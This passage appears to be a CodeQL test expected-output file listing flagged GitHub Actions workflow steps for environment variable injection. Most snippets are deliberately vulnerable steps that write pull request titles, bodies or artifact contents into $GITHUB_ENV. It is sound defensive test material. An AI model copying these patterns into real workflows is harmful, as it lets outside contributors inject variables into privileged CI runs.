'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | semmle.label | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | +subpaths +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref 